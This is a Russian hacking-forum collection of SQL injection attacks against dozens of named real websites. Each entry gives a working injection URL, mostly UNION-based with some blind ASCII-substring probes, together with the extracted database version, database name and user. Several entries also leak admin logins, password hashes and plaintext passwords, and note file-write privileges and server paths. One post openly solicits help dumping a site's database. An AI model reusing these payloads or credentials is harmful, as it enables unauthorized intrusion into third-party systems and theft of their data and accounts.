SQL Инъекции

http://www.folieanticondens.ro/index.php?page=prod&lang=ro&prod=20+AND+ASCII(SUBSTRING((select+version()),1,1))>x--

x=53,46,48,46,54,55,45,99,111,109,109,117,110,105,116,121,45,108,111,103


http://www.folieanticondens.ro/index.php?page=prod&lang=ro&prod=20+AND+ASCII(SUBSTRING((select+database()),1,1))>x--


x=102,105,110,97,108,100,95,102,111,108,105,101


http://www.folieanticondens.ro/index.php?page=prod&lang=ro&prod=20+AND+ASCII(SUBSTRING((select+user()),1,1))>x--


x=102,105,110,97,108,100,95,97,100,109,105,110,64,108,111,99,97,108,104,111,115,116





Version : 5.0.67-community-log
Database : finald_folie
User : finald_admin@localhost

 

http://www.eleven.co.il/print.php?id=-10591+union+select+1,2,3,4,5,6,7,8,9,user()--
eleven@localhost
5.0.77
elevenart
/var/db/mysql/

http://www.eastrovedica.in/article.php?id=12317+order+by+17--&act=print

wisdoma_indiart@localhost
5.1.30
portbld-freebsd7.1

 

http://www.ircolours.ro/index.php?view=product&id=-32+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17



Database Version: 5.0.67-community-log
Database name: ircolour_ircolours
User name: ircolour_webagen@localhost

 

bugeisha.ru PR-4 ТиЦ 650 вывод в сурсе страницы(в <input type="hidden")

PHP:

http://bugeisha.ru/aikido/aikido/post.php3?topic_id=-1+union+select+1,2,3,4,concat(0x27203e3c62723e,user(),0x3A,version(),0x3a,database(),0x3c212d2d2d2d)+--+


интересные колонки:

 

http://www.artmobila.md/index.php?section=news&id=-1234271747+union+select+1,concat_ws(0x3a,version(),database(),user()),3&lang=ru



Database Version: 5.0.51
Database name: artmobil_artmobila
User name: artmobil_site@localhost

 

Автоэкзотика
Pagerank: 5
тИЦ: 600

Code:

http://www.autoexotica.ru/news/?nid=1+union+select+1,concat _ws(0x3a,versio n(),database(),user()),3,4,5,6,7,8,9,10,11--

Database Version : 5.0.45
Database name : autoexotica
User name : autoexoticaru@localhost

юзеры выводятся без лимита:

Code:

http://www.autoexotica.ru/news/?nid=1+union+select+1,conca t_ws(0x3a,name,member_login_key),3,4,5,6,7,8,9,10,11+from+ibf_members--

админ:

Code:

autoexotica:3bceae1f772c17b075b311e2a6eacb8b

---------------------------------------------------------#

Pagerank: 3
тИЦ: 250

Code:

http://www.vw-club.ru/vw/news/show_news.php?id=-1+union+select+1,concat_ ws(0x3a,version() ,database(),user()),3,4,5,6--

Database Version : 4.1.21-log
Database name : rds_vwclub
User name : rds_vwclub@localhost

 

http://www.naturalwoodfloor.ro/parchet_specificatii.php?id=-36+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6



Database Version: 5.0.67-community-log
Database name: naturalw_db
User name: naturalw_acces@localhost

 

Code:

www.magnet.ru

PR: 4
Тиц: 180
Версия: 5.0.51a-log
База данных: magnetru
Юзверь: [email protected]

Code:

http://magnet.ru/news.php?nid=2131231%20union%20select%201,concat(password,0x3a,user),3,4,5%20from%20mysql.user%20limit%201,1--

Логин: alex
Пароль: *676243218923905CF94CB52A3C9D3EB30CE8E20D

PS: File priv = Y

/usr/local/www/client/magnet.ru/www/
Путь =))
Дальше думаю сами курите че можно сделать -)

 

http://www.formul.ru

ВНИМАНИЕ, Мнеб слить движок их желательно каэшн прям с базой)...
Прошу помощи в осуществлении))
В Личку
Админка: http://www.formul.ru/admin/

Нарыл это:
http://www.formul.ru/index.php?cat_id=-1'+union+select+1,2,3,4,5,6,column_name,8,9,0,10,11,12,13,14,15,16,17,18,19,20+CPU_USER+from+information_schema.columns/*

 

Code:

http://trubotorg33.ru

PR: 1
Тиц: 0
Версия: 5.0.75
База данных: trt
Юзверь: root@localhost

Code:

http://www.trubotorg33.ru/index.php?id=12&nid=1342343%20union%20select%201,2,3,concat_ws(0x3a,id,name,passw),5,6,7,8,9%20from%20users--

Админка: Ненашел =(
Логин: adm
Пароль: 110001

Есть доступ к mysql.user
File Priv = Y =)
/home/edu/data/www/trubotorg33.ru/class/
Че то седня фортит=)

 

http://media-empire.net/spam/e-Spam.php?intSpamID=-251+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12--

[email protected]
5.0.67-log
ewok_bloods

 

Code:

http://snm.nnov.ru

PR: 4
Тиц: 30
Версия: 4.0.25
База данных: snmsila
Юзверь: snmsila@localhost

Code:

http://www.snm.nnov.ru/?doc=4&id=12&nid=-1%20union%20select%201,2,3,4,5--

 

Магаз футболок

Code:

http://topmayka.com/index.php?action=looktshirt&id=-229%20union%20select%201,version(),3,4,5,6,7,8,9,10%20from%20users%20--

version::4.1.22-log

 

http://www.edilgroup.ro/punct-presa-detaliu.php?id=-9+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13




Database Version: 5.0.32-Debian_7etch6
Database name: edilgroup
User name: edilgroup@localhost

 

www.kos-check.com PR=3

Code:

http://www.kos-check.com/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,concat_ws(version(),user(),database()),3,4,5--

kosmma_admin@localhost
4.1.22-standard-log
kosmma_cms

www.dsm.edu.uy PR=5

Code:

http://www.dsm.edu.uy/index.php?option=com_rsgallery&page=inline&catid=-1+UNION+SELECT+1,1,user(),3, version(),5,6,7,8,9,10,11--

5.0.51a-community
dsmedu_admin@localhost

 

www.kop.ru pr-3 Тиц - 400

PHP:

http://www.kop.ru/?go=issues&issue=-79+union+select+1,2,3,4,concat_ws(0x3A,@@version,user()),6,7+--+


@@version: 5.0.45
user(): [email protected]

 

artpace.org - PR5 тИЦ - 10

Code:

http://www.artpace.org/aboutTheExhibition.php?axid=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8/*

Есть еще табла sec_user, но там ничего интерестного...

Code:

http://www.artpace.org/aboutTheExhibition.php?axid=-99999+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables+limit+38,1/*

 

http://www.tiglastal.ro/produse.php?cat=3&scat=-23+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7



Database Version: 4.1.22-standard
Database name: tiglas_tiglas
User name: tiglas_tiglas@localhost


http://www.favisan.ro/catalog.php?detalii=-171+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8


Database Version: 4.1.22-standard
Database name: favisan_favisan
User name: favisan@localhost

 

Интернет магазин

saktalingchan.com PR=5


Database saktalin_shop
Таблицы:

Code:

CJ_UsersOnline
true_admin  
true_boardans 
true_boardque 
true_boardworld 
true_config  
true_confirm  
true_content 
true_contentcat 
true_contentsub 
true_gallery  
true_gallerycat  
true_help 
true_help2  
true_items  
true_links  
true_product 
true_productcategory 
true_productcategorysub 
true_proname 
true_sale 
true_ticket

Code:

http://www.saktalingchan.com/product.php?catid=1&catsubid=3&id=171+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3,id,user,pass ),10,11,12,13,14,15,16,17,18,19,20+from+true_admin--

С выводом пароля че-то втыкал долго не думал что pass

2 админа
login:saktalingchan pass:8687222
login:trueamulet pass:jwebmaster



Админку не нашел правда я её и не особо искал




grandlite.co.th


Database grandlit_db
Table:

Code:

grandliteadmin 
prdadep  
prdbcat 
prdcprd  

Сайт ваще весь дырявый как друшлак

Code:

http://www.grandlite.co.th/onproduct.php?id=277+UNION+SELECT+1,2,3,4,concat_ws(0x3,password),6,7,8,9,10,11+from+grandliteadmin+limit+1,1--

Code:

http://www.grandlite.co.th/product.php?depid=9+UNION+SELECT+1,2,3,4,concat_ws(0x3,password),6,7,8,9,10,11+from+grandliteadmin--

Админку не нашёл и тут. Все что удалось узнать это pass=password а логин скоре всего admin.

 

АП, вот вам мой севодняшний сбор уязвимостей! Пройдемся по nl.

Code:

http://www.nanoshield.nl/productinfo.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8--

версия/юзер/бд:

Code:

[email protected]_7etch8faq

------------------------------------------------------------------

Code:

http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3--

версия/юзер/бд:

Code:

[email protected]

------------------------------------------------------------------

Code:

http://www.jansiebelink.nl/detail.php?id=-1+union+all+select+concat_ws(version(),user(),database())--

версия/юзер/бд:

Code:

[email protected]_7etch8-logjan

----------------------------------------------------------------

Code:

http://www.nvha.nl/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--

версия/юзер/бд:

Code:

[email protected]

-----------------------------------------------------------------

Code:

http://www.art-innovation.nl/event.php?id=-1+union+all+select+concat_ws(version(),user(),database()),1--

версия/юзер/бд:

Code:

[email protected]_main

------------------------------------------------------------------

Code:

http://www.tamaynut.nl/newsdetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10,11--

версия/юзер/бд:

Code:

[email protected]_tamaynut

----------------------------------------------------------------

Code:

http://www.trovet.nl/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(version(),user(),database()),6,7--

версия/юзер/бд:

Code:

[email protected]_data

---------------------------------------------------------------

Code:

http://www.26000gezichten.nl/news.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13--

версия/юзер/бд:

Code:

[email protected]_Debian-10sarge2-log26000gezichten

--------------------------------------------------------------

Code:

http://www.zeelandwoning.nl/pages.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2--

версия/юзер/бд:

Code:

[email protected]_joom

---------------------------------------------------------------

Code:

http://www.opdesloep.nl/pages.php?id=-1+union+all+select+0,1,2,convert(concat_ws(version(),user(),database())+using+latin1),4,5--

версия/юзер/бд:

Code:

[email protected]

----------------------------------------------------------------------

The End!​